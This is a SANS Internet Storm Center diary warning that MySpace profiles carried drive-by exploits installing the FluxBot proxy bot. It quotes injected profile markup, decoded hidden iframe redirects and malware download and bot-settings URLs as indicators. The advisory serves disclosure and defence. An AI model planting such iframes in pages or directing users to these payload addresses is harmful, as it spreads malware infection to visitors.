Threat Level: green Handler on Duty: Jim Clausing

SANS ISC: MySpace Flux Malware - SANS Internet Storm Center SANS ISC InfoSec Forums

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
MySpace Flux Malware

CAREFUL! This diary contains links to malicious code!

A number of MySpace profiles include drive by exploits.  The exploits will install a version of "flux bot", a very popular proxy network bot.

  FluxBot (aka "FastFlux", "Storm") is typically used to hide phishing and malware delivery sites behind complex ever changing networks of proxy servers. A system infected with FluxBot will be used a one of these proxies.

  Infected MySpace "Friend IDs": 39184135, 171598920, 22057010

  A typical excerpt from an infected profile (obfuscated to protect the innocent): 


<a style="text-decoration:none;;top:1px;left:1px;"
href="http://home. myspace. com. index. cfm. fuseaction.user.MyToken."><img

   The actual exploit / malware is served via an existing flux network. * will redirect the user to an encoded javascript which decodes to:

    <iframe src="http://fafb4c4c .com/header_03.gif" width=1
   The domain used here is of course again served via flux. header_03.gif


    <iframe src="http://fafb4c4c .com/routine.php" width=1

   Are we there yet? yup. just one more (patched) Internet Explorer exploit to go. The
exploit will install the .exe. For example:

http://fafb4c4c .com/session.exe (this is just the downloader stub)

The downloader will now retrieve the actual bot. We have seen among others these

http://www.myfiles .hk/exes/webdl3x/weby.exe
http://www.myfiles .hk/exes/webdl3x/oly.exe

Settings for the bot can be found here:

http://settings.iconnectyou .biz
http://fcs.camgenie .com/weby7.exe

once its all set and done, you will be a proud new member of the flux net and soon you
will find your system to participate in phishing and similar endevours.

Couple IPs that may be worthwhile to block:

AS13767   | 
AS15083   |
AS25761   |    
AS25761   |   

As you can imagine, its a lot of messy work to decode all of this. I am just the messenger. This is work done by members of our great handler team.





3036 Posts
ISC Handler

Sign Up for Free or Log In to start participating in the conversation!